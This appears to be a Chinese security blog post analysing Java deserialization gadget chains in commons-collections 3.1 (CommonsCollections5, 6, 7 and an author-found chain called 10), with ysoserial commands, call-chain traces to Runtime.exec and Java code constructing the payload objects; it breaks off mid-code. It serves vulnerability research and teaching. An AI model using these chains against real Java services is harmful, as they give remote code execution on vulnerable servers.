<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  
  <title>【notes】Java反序列化利用链挖掘之CommonsCollections5,6,7,9,10 | 0kami&#39;s Blog</title>
  <meta name="description" content="A Web 🐶 &amp;&amp; Code Reviewer">
  <meta name="keywords" content>
  <meta name="HandheldFriendly" content="True">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <link rel="shortcut icon" href="/images/avatar.jpg">
  <link rel="alternate" href="/atom.xml" title="0kami's Blog">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="0x00 前言本文继续分析CommonsCollections的相关反序列化利用链，这次主要分析CommonsCollections5,6,7，以及我找的一个新利用链，这里暂且将其称为10.">
<meta name="keywords" content="vul">
<meta property="og:type" content="article">
<meta property="og:title" content="【notes】Java反序列化利用链挖掘之CommonsCollections5,6,7,9,10">
<meta property="og:url" content="http://blog.0kami.cn/2019/10/31/java/study-java-deserialized-commonscollections3-others/index.html">
<meta property="og:site_name" content="0kami&#39;s Blog">
<meta property="og:description" content="0x00 前言本文继续分析CommonsCollections的相关反序列化利用链，这次主要分析CommonsCollections5,6,7，以及我找的一个新利用链，这里暂且将其称为10.">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029103316582.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029103756251.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029110642707.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029110812953.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029111315584.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029145451405.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029150815776.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029170332420.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029170517723.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029173505843.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029173654711.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191031172937969.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191031181203017.png">
<meta property="og:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191031183753047.png">
<meta property="og:updated_time" content="2020-11-18T14:30:35.931Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【notes】Java反序列化利用链挖掘之CommonsCollections5,6,7,9,10">
<meta name="twitter:description" content="0x00 前言本文继续分析CommonsCollections的相关反序列化利用链，这次主要分析CommonsCollections5,6,7，以及我找的一个新利用链，这里暂且将其称为10.">
<meta name="twitter:image" content="http://blog.0kami.cn/images/java-deserialized-commonscollections-others-20191031/image-20191029103316582.png">

  <link href="https://fonts.googleapis.com/css?family=Inconsolata|Titillium+Web" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css?family=Roboto+Mono" rel="stylesheet">
  <link href="//cdn.bootcss.com/node-waves/0.7.5/waves.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/style.css">
  <script>
    function setLoadingBarProgress(num) {
      document.getElementById('loading-bar').style.width=num+"%";
    }
  </script>
</head>
</html>
<body>
  <div id="loading-bar-wrapper">
  <div id="loading-bar"></div>
</div>


  <script>setLoadingBarProgress(20)</script> 
  <header class="l_header">
	<div class='wrapper'>
		<div class="nav-main container container--flex">
			<a class="logo flat-box" href='/' >
				0kami's Blog
			</a>
			<div class='menu'>
				<ul class='h-list'>
					
						<li>
							<a class='flat-box nav-home' href='/'>
								Home
							</a>
						</li>
					
						<li>
							<a class='flat-box nav-archives' href='/archives'>
								Archives
							</a>
						</li>
					
						<li>
							<a class='flat-box nav-about' href='/about'>
								About
							</a>
						</li>
					
				</ul>
				<div class='underline'></div>
			</div>
			
				<div class="m_search">
					<form name="searchform" class="form u-search-form">
						<input type="text" class="input u-search-input" placeholder="Search" />
						<span class="icon icon-search"></span>
					</form>
				</div>
			
			<ul class='switcher h-list'>
				
					<li class='s-search'><a href='javascript:void(0)'><span class="icon icon-search flat-box"></span></a></li>
				
				<li class='s-menu'><a href='javascript:void(0)'><span class="icon icon-menu flat-box"></span></a></li>
			</ul>
		</div>
		
		<div class='nav-sub container container--flex'>
			<a class="logo" class="flat-box" href='javascript:void(0)'>
				Word of Forks
			</a>

			<ul class='switcher h-list'>
				<li class='s-comment'><a href='javascript:void(0)'><span class="icon icon-chat_bubble_outline flat-box"></span></a></li>
				<li class='s-top'><a href='javascript:void(0)'><span class="icon icon-arrow_upward flat-box"></span></a></li>
				<li class='s-toc'><a href='javascript:void(0)'><span class="icon icon-format_list_numbered flat-box"></span></a></li>
			</ul>
		</div>
	</div>
</header>
<aside class="menu-phone">
	<nav>
		
			<a href="/" class="nav-home nav">
				Home
			</a>
		
			<a href="/archives" class="nav-archives nav">
				Archives
			</a>
		
			<a href="/about" class="nav-about nav">
				About
			</a>
		
	</nav>
</aside>

    <script>setLoadingBarProgress(40);</script>
  <div class="l_body">
    <div class='container clearfix'>
      <div class='l_main'>
        <article id="post-java/study-java-deserialized-commonscollections3-others"
  class="post white-box article-type-post"
  itemscope itemprop="blogPost">
	<section class='meta'>
	<h2 class="title">
  	<a href="/2019/10/31/java/study-java-deserialized-commonscollections3-others/">
    	【notes】Java反序列化利用链挖掘之CommonsCollections5,6,7,9,10
    </a>
  </h2>
	<time>
	  Oct 31, 2019
	</time>
	
    
    <div class='cats'>
        <a href="/categories/notes/">notes</a>
    </div>

	</section>
	
		<section class="toc-wrapper"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x00-前言"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x01-环境准备"><span class="toc-number">2.</span> <span class="toc-text">0x01 环境准备</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x02-利用链分析"><span class="toc-number">3.</span> <span class="toc-text">0x02 利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-背景回顾"><span class="toc-number">3.1.</span> <span class="toc-text">1. 背景回顾</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-重新构造前半部分利用链–CommonsCollections5"><span class="toc-number">3.2.</span> <span class="toc-text">2. 重新构造前半部分利用链–CommonsCollections5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-重新构造前半部分利用链–CommonsCollections6"><span class="toc-number">3.3.</span> <span class="toc-text">3. 重新构造前半部分利用链–CommonsCollections6</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-重新构造前半部分利用链–CommonsCollections7"><span class="toc-number">3.4.</span> <span class="toc-text">4. 重新构造前半部分利用链–CommonsCollections7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-利用链构造"><span class="toc-number">3.5.</span> <span class="toc-text">5. 利用链构造</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#CommonsCollections6"><span class="toc-number">3.5.1.</span> <span class="toc-text">CommonsCollections6</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CommonsCollections7"><span class="toc-number">3.5.2.</span> <span class="toc-text">CommonsCollections7</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6-构造新CommonsCollections10"><span class="toc-number">3.6.</span> <span class="toc-text">6. 构造新CommonsCollections10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7-梅子酒师傅的CommonsCollections9"><span class="toc-number">3.7.</span> <span class="toc-text">7. 梅子酒师傅的CommonsCollections9</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x03-总结"><span class="toc-number">4.</span> <span class="toc-text">0x03 总结</span></a></li></ol></section>
	
	<section class="article typo">
  	<div class="article-entry" itemprop="articleBody">
    	<h1 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h1><p>本文继续分析CommonsCollections的相关反序列化利用链，这次主要分析CommonsCollections5,6,7，以及我找的一个新利用链，这里暂且将其称为10.</p>
<a id="more"></a>
<h1 id="0x01-环境准备"><a href="#0x01-环境准备" class="headerlink" title="0x01 环境准备"></a>0x01 环境准备</h1><hr>
<p>jdk8，commons-collections:3.1</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 <span class="string">"open /System/Applications/Calculator.app"</span> &gt; commonscollections5.ser</span><br><span class="line">java -jar ysoserial-master-30099844c6-1.jar CommonsCollections6 <span class="string">"open /System/Applications/Calculator.app"</span> &gt; commonscollections6.ser</span><br><span class="line">java -jar ysoserial-master-30099844c6-1.jar CommonsCollections7 <span class="string">"open /System/Applications/Calculator.app"</span> &gt; commonscollections7.ser</span><br></pre></td></tr></table></figure>
<h1 id="0x02-利用链分析"><a href="#0x02-利用链分析" class="headerlink" title="0x02 利用链分析"></a>0x02 利用链分析</h1><hr>
<h2 id="1-背景回顾"><a href="#1-背景回顾" class="headerlink" title="1. 背景回顾"></a>1. 背景回顾</h2><p>前面提到过CommonsCollections1和3在构造AnnotationInvocationHandler时用到了Override.class。但是如果你在jdk8的环境下去载入生成的payload，会发生<code>java.lang.Override missing element entrySet</code>的错误。</p>
<p>这个错误的产生原因主要在于jdk8更新了<code>AnnotationInvocationHandler</code><a href="http://hg.openjdk.java.net/jdk8u/jdk8u-dev/jdk/diff/8e3338e7c7ea/src/share/classes/sun/reflect/annotation/AnnotationInvocationHandler.java" target="_blank" rel="noopener">参考</a></p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029103316582.png" alt="image-20191029103316582"></p>
<p>jdk8不直接调用<code>s.defaultReadObject</code>来填充当前的<code>AnnotaionInvocationHandler</code>实例，而选择了单独填充新的变量。</p>
<p>这里我们回顾一下，1和3的payload的触发点是<code>LazyMap.get</code>函数，而触发这个函数需要使得<code>memberValues</code>为<code>LazyMap</code>对象</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029103756251.png" alt="image-20191029103756251"></p>
<p>显然，jdk8的操作使得<code>memberValues</code>并不是我们构造好的<code>LazyMap</code>类型。在调试中，可以看到此时的<code>memberValues</code>为<code>LinkedHashMap</code>对象，该对象无法获得<code>entrySet</code>的内容，所以会报前面的这个错误。</p>
<p>jdk8下CommonsCollections1和3无法成功利用了，但是如果我们可以找到一个替代AnnotationInvocationHandler的利用方式呢？这就是本文要讲的CommonsCollections5，6，7所做出的改变。</p>
<h2 id="2-重新构造前半部分利用链–CommonsCollections5"><a href="#2-重新构造前半部分利用链–CommonsCollections5" class="headerlink" title="2. 重新构造前半部分利用链–CommonsCollections5"></a>2. 重新构造前半部分利用链–CommonsCollections5</h2><p>CommonsCollections5与1的区别在于AnnotationInvocationHandler，后部分是相同的，所以这里不分析后部分。</p>
<p>AnnotationInvocationHandler在前面起到的作用是来触发LazyMap.get函数，所以我们接下来就是要重新找一个可以触发该函数的对象。这个对象满足</p>
<ul>
<li>类可序列化，类属性有个可控的Map对象或Object</li>
<li>该类的类函数上有调用这个Map.get的地方</li>
</ul>
<p>CommonsCollections5在这里用到了TiedMapEntry，来看一下</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029110642707.png" alt="image-20191029110642707"></p>
<p>TiedMapEntry有一个map类属性，且在getValue处调用了map.get函数。同时toString、hashCode、equals均调用了getValue函数，这里关注toString函数。</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029110812953.png" alt="image-20191029110812953"></p>
<p>toString函数通常在与字符串拼接时，会被自动调用。那么接下来我们需要找一个对象满足</p>
<ul>
<li>类可序列化，类属性有个Map.Entry对象或Object</li>
<li>该类会自动调用这个类属性的toString函数或前面的另外几种</li>
</ul>
<p>这里选择了<code>BadAttributeValueExpException</code>对象，他的<code>readObject</code>函数会自动调用类属性的<code>toString</code>函数。</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029111315584.png" alt="image-20191029111315584"></p>
<p>需要注意的是这里<code>System.getSecurityManager</code>为空，换句话说，就是当前的jvm环境不能启用安全管理器。</p>
<p>来看一下一整个调用链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">BadAttributeValueExpException.readObject()</span><br><span class="line">	-&gt; valObj.toString() =&gt; TiedMapEntry.getValue</span><br><span class="line">	-&gt; TiedMapEntry.map.get() =&gt; LazyMap.get()</span><br><span class="line">	-&gt; factory.transform() =&gt; ChainedTransformer.transform()</span><br><span class="line">	-&gt; 前文构造的Runtime.getRuntime().exec()</span><br></pre></td></tr></table></figure>
<h2 id="3-重新构造前半部分利用链–CommonsCollections6"><a href="#3-重新构造前半部分利用链–CommonsCollections6" class="headerlink" title="3. 重新构造前半部分利用链–CommonsCollections6"></a>3. 重新构造前半部分利用链–CommonsCollections6</h2><p>CommonsCollections6是另一种替换方式，后半部分的利用链还是没有变，不作分析。</p>
<p>我们在2中提到了除了CommonsCollections5用的<code>toString</code>外，还有<code>hashCode</code>和<code>equals</code>函数也调用了getValue函数。那么是否存在调用这两个函数的对象函数呢？答案是肯定的！</p>
<p>CommonsCollections6利用了<code>TiedMapEntry</code>的<code>hashCode</code>函数，来触发<code>LazyMap.get</code></p>
<p>我们都知道HashSet集合里不会存在相同的key，那么是如何判断是否是相同的key呢？这里就要用到key的hashCode函数了，如果key的值相同，其hashCode返回的值也是相同的。这里的HashCode的计算在HashSet的put和add函数完成，并且HashSet从序列化数据中还原出来时会自动调用put函数，这里就给我们提供了可控的地方。</p>
<p>先来看一下HashSet的<code>readObject</code>函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029145451405.png" alt="image-20191029145451405"></p>
<p>继续跟put函数，这里其实调用的是HashMap的put函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029150815776.png" alt="image-20191029150815776"></p>
<p>其中对key调用的<code>hash()</code>函数会调用<code>key.hashCode</code>函数，那么现在就很清楚了，我们只要将key的值替换成构造好的<code>TiedMapEntry</code>对象就可以了。注意，这里的key值其实就是<code>HashSet.add</code>的实例，在HashSet里的HashMap类属性只用到了Key。</p>
<p>整理一下利用链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HashSet.readObject()</span><br><span class="line">	-&gt; HashMap.put(key) =&gt; key.hashCode =&gt; TiedMapEntry.hashCode</span><br><span class="line">	-&gt; TiedMapEntry.getValue</span><br><span class="line">	-&gt; TiedMapEntry.map.get() =&gt; LazyMap.get()</span><br><span class="line">	-&gt; factory.transform() =&gt; ChainedTransformer.transform()</span><br><span class="line">	-&gt; 前文构造的Runtime.getRuntime().exec()</span><br></pre></td></tr></table></figure>
<h2 id="4-重新构造前半部分利用链–CommonsCollections7"><a href="#4-重新构造前半部分利用链–CommonsCollections7" class="headerlink" title="4. 重新构造前半部分利用链–CommonsCollections7"></a>4. 重新构造前半部分利用链–CommonsCollections7</h2><p>CommonsCollections7用了Hashtable来代替<code>AnnotationInvocationHandler</code>，不同于前面两种CommonsCollections7并未使用<code>TiredMapEntry</code>，而是用了相同key冲突的方式调用<code>equals</code>来触发<code>Lazy.get</code>函数。</p>
<p>先来看一下<code>Hashtable</code>的<code>readObject</code>函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029170332420.png" alt="image-20191029170332420"></p>
<p>继续跟进<code>reconstitutionPut</code></p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029170517723.png" alt="image-20191029170517723"></p>
<p>该函数将填充table的内容，其中第1236行仅当有重复数据冲突时，才会进入下面的if语句，这里我们继续跟进<code>equals</code>函数</p>
<p>这里的<code>equals</code>函数取决于<code>key</code>的对象，利用链用的是<code>LazyMap</code>对象，实际调用的是父类<code>AbstractMapDecorator</code>的<code>equals</code>函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029173505843.png" alt="image-20191029173505843"></p>
<p>这里又调用了map的equals函数，这里实际调用的是HashMap的父类<code>AbstractMap</code>的<code>equals</code>函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191029173654711.png" alt="image-20191029173654711"></p>
<p>在第495行调用了<code>m.get</code>函数，所以后面又是我们熟悉的<code>LazyMap.get</code>的套路了。</p>
<p>整理一下利用链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Hashtable.readObject()</span><br><span class="line">	-&gt; Hashtable.reconstitutionPut</span><br><span class="line">	-&gt; LazyMap.equals =&gt; AbstractMapDecorator.equals =&gt; AbstractMap.equals</span><br><span class="line">	-&gt; m.get() =&gt; LazyMap.get()</span><br><span class="line">	-&gt; factory.transform() =&gt; ChainedTransformer.transform()</span><br><span class="line">	-&gt; 前文构造的Runtime.getRuntime().exec()</span><br></pre></td></tr></table></figure>
<h2 id="5-利用链构造"><a href="#5-利用链构造" class="headerlink" title="5. 利用链构造"></a>5. 利用链构造</h2><p>CommonsCollections6和7的exp构造比较复杂，这里单独拿出来讲一下。</p>
<hr>
<h3 id="CommonsCollections6"><a href="#CommonsCollections6" class="headerlink" title="CommonsCollections6"></a>CommonsCollections6</h3><p>经过前面的分析，我们可以知道CommonsCollections6需要将构造好的TiedMapEntry实例添加到HashSet的值上。</p>
<p>简单的方法就是直接add</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, <span class="string">"foo"</span>);</span><br><span class="line">HashSet map = <span class="keyword">new</span> HashSet(<span class="number">1</span>);</span><br><span class="line">map.add(entry);</span><br></pre></td></tr></table></figure>
<p>复杂一点，就是ysoserail里的实现方法，采用反射机制来完成</p>
<p>其思路主要为：</p>
<ul>
<li>实例化一个HashSet实例</li>
<li>通过反射机制获取HashSet的map类属性</li>
<li>通过反射机制获取HashMap(map类属性)的table(Node&lt;K,V&gt;)类属性</li>
<li>通过反射机制获取Node的key类属性，并设置该key的值为构造好的TiedMapEntry实例</li>
</ul>
<p>具体代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">HashSet map = <span class="keyword">new</span> HashSet(<span class="number">1</span>);</span><br><span class="line">map.add(<span class="string">"foo"</span>);</span><br><span class="line">Field f = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    f = HashSet.class.getDeclaredField("map");//获取HashSet的map Field对象</span><br><span class="line">&#125; <span class="keyword">catch</span> (NoSuchFieldException e) &#123;</span><br><span class="line">    f = HashSet.class.getDeclaredField("backingMap");</span><br><span class="line">&#125;</span><br><span class="line">Permit.setAccessible(f);<span class="comment">// 设置map可被访问修改</span></span><br><span class="line">HashMap innimpl = <span class="keyword">null</span>;</span><br><span class="line">innimpl = (HashMap) f.get(map);<span class="comment">// 获取map实例的map类属性</span></span><br><span class="line"></span><br><span class="line">Field f2 = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">  f2 = HashMap.class.getDeclaredField("table");// 获取HashMap的 table field</span><br><span class="line">&#125; <span class="keyword">catch</span> (NoSuchFieldException e) &#123;</span><br><span class="line">  f2 = HashMap.class.getDeclaredField("elementData");</span><br><span class="line">&#125;</span><br><span class="line">Permit.setAccessible(f2);<span class="comment">// 设置HashMap的field 可被访问</span></span><br><span class="line">Object[] array = <span class="keyword">new</span> Object[<span class="number">0</span>];</span><br><span class="line">array = (Object[]) f2.get(innimpl);</span><br><span class="line">Object node = array[<span class="number">0</span>];<span class="comment">// 获取Node&lt;k,v&gt;实例</span></span><br><span class="line"><span class="keyword">if</span>(node == <span class="keyword">null</span>)&#123;</span><br><span class="line">  node = array[<span class="number">1</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">Field keyField = <span class="keyword">null</span>;</span><br><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">  keyField = node.getClass().getDeclaredField(<span class="string">"key"</span>);<span class="comment">// 获取Node的key field</span></span><br><span class="line">&#125;<span class="keyword">catch</span>(Exception e)&#123;</span><br><span class="line">  keyField = Class.forName(<span class="string">"java.util.MapEntry"</span>).getDeclaredField(<span class="string">"key"</span>);</span><br><span class="line">&#125;</span><br><span class="line">Permit.setAccessible(keyField);<span class="comment">// 设置该Field可被访问修改</span></span><br><span class="line">keyField.set(node, entry);<span class="comment">// 对node实例填充key的值为TiedMapEntry实例</span></span><br></pre></td></tr></table></figure>
<p>经过上面的操作，最终的HashSet实例被我们嵌入了构造好的TiedMapEntry实例。</p>
<p>这里在调试的过程中，发现用ysoserail的Reflections来简化exp，出来的结果有点不一样，还没有找到具体的原因。如果有师傅遇到过这种问题，欢迎一起讨论讨论！</p>
<hr>
<h3 id="CommonsCollections7"><a href="#CommonsCollections7" class="headerlink" title="CommonsCollections7"></a>CommonsCollections7</h3><p>CommonsCollections利用的是key的hash冲突的方法来触发<code>equals</code>函数，该函数会调用<code>LazyMap.get</code>函数</p>
<p>那么构造exp的关键就是构造一个hash冲突的LazyMap了。</p>
<p>这里大家可以跟一下String.hashCode函数，他的计算方法存在不同字符串相同hash的可能性，例如如下代码</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191031172937969.png" alt="image-20191031172937969"></p>
<p>CommonsCollections7用的就是这个bug来制造hash冲突。</p>
<p>这里需要提一点的是触发LazyMap.get函数</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191031181203017.png" alt="image-20191031181203017"></p>
<p>要走到第151行红框框上，首先需要满足的是<code>map</code>里不存在当前这个<code>key</code></p>
<p>但是明显在第一次不存在这个<code>key</code>后，会更新<code>map</code>的键值，这将导致下次同样的<code>key</code>进来，就不会触发后续的payload了。我们在写exp的时候需要注意到这一点。</p>
<p>来看一下ysoserial的CommonsCollections7是怎么编写的！</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">Map innerMap1 = <span class="keyword">new</span> HashMap();</span><br><span class="line">Map innerMap2 = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line"><span class="comment">// Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject</span></span><br><span class="line">Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);</span><br><span class="line">lazyMap1.put(<span class="string">"yy"</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);</span><br><span class="line">lazyMap2.put(<span class="string">"zZ"</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Use the colliding Maps as keys in Hashtable</span></span><br><span class="line">Hashtable hashtable = <span class="keyword">new</span> Hashtable();</span><br><span class="line">hashtable.put(lazyMap1, <span class="number">1</span>);</span><br><span class="line">hashtable.put(lazyMap2, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">Reflections.setFieldValue(transformerChain, <span class="string">"iTransformers"</span>, transformers);</span><br><span class="line"><span class="comment">// Needed to ensure hash collision after previous manipulations</span></span><br><span class="line">lazyMap2.remove(<span class="string">"yy"</span>);</span><br></pre></td></tr></table></figure>
<p>其中第两次的put会使得会使得LazyMap2中增加了yy这个键值，为了保证反序列化后仍然可以触发后续的利用链，这里需要将lazyMap2的yy键值remove掉。</p>
<h2 id="6-构造新CommonsCollections10"><a href="#6-构造新CommonsCollections10" class="headerlink" title="6. 构造新CommonsCollections10"></a>6. 构造新CommonsCollections10</h2><p>经过对前面1,3,5,6,7的分析，我们其实可以发现很多payload都是“杂交”的成果。那么我们是否能根据前面的分析，构造出一个新的CommonsCollections的payload呢？答案当然是肯定的，接下来讲一下我找到的一个新payload利用。</p>
<p>这个payload为CommonsCollections6和7的结合，同CommonsCollections6类似，这里也用到了<code>TiedMapEntry</code>的<code>hashCode</code>函数</p>
<p>我们在分析<code>Hashtable</code>的<code>reconstitutionPut</code>函数时，看下图</p>
<p><img src="/images/java-deserialized-commonscollections-others-20191031/image-20191031183753047.png" alt="image-20191031183753047"></p>
<p>该函数在第1234行对<code>key</code>调用了一次<code>hashCode</code>函数，那么很明显，如果key值被代替为构造好的<code>TiedMapEntry</code>实例，这里我们就能触发<code>LazyMap.get</code>函数，后续的调用链就类似了。</p>
<p>整理一下利用链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Hashtable.readObject()</span><br><span class="line">	-&gt; Hashtable.reconstitutionPut</span><br><span class="line">	-&gt; key.hashCode() =&gt; TiedMapEntry.hashCode()</span><br><span class="line">	-&gt; TiedMapEntry.getValue</span><br><span class="line">	-&gt; TiedMapEntry.map.get() =&gt; LazyMap.get()</span><br><span class="line">	-&gt; factory.transform() =&gt; ChainedTransformer.transform()</span><br><span class="line">	-&gt; 前文构造的Runtime.getRuntime().exec()</span><br></pre></td></tr></table></figure>
<p>其实从利用链来看，与CommonsCollections6的区别在于前部的触发使用了不同的对象。</p>
<p>接下来，结合第5点的学习，我们来写一下这个payload的利用链exp</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> Transformer transformerChain = <span class="keyword">new</span> ChainedTransformer(<span class="keyword">new</span> Transformer[]&#123;&#125;);</span><br><span class="line"></span><br><span class="line"><span class="keyword">final</span> Map innerMap = <span class="keyword">new</span> HashMap();</span><br><span class="line"><span class="keyword">final</span> Map innerMap2 = <span class="keyword">new</span> HashMap();</span><br><span class="line"></span><br><span class="line"><span class="keyword">final</span> Map lazyMap = LazyMap.decorate(innerMap, transformerChain);</span><br><span class="line"></span><br><span class="line">TiedMapEntry entry = <span class="keyword">new</span> TiedMapEntry(lazyMap, <span class="string">"foo"</span>);</span><br><span class="line">Hashtable hashtable = <span class="keyword">new</span> Hashtable();</span><br><span class="line">hashtable.put(<span class="string">"foo"</span>,<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 获取hashtable的table类属性</span></span><br><span class="line">Field tableField = Hashtable.class.getDeclaredField("table");</span><br><span class="line">Permit.setAccessible(tableField);</span><br><span class="line">Object[] table = (Object[])tableField.get(hashtable);</span><br><span class="line">Object entry1 = table[<span class="number">0</span>];</span><br><span class="line"><span class="keyword">if</span>(entry1==<span class="keyword">null</span>)</span><br><span class="line">    entry1 = table[<span class="number">1</span>];</span><br><span class="line"><span class="comment">// 获取Hashtable.Entry的key属性</span></span><br><span class="line">Field keyField = entry1.getClass().getDeclaredField(<span class="string">"key"</span>);</span><br><span class="line">Permit.setAccessible(keyField);</span><br><span class="line"><span class="comment">// 将key属性给替换成构造好的TiedMapEntry实例</span></span><br><span class="line">keyField.set(entry1, entry);</span><br><span class="line"><span class="comment">// 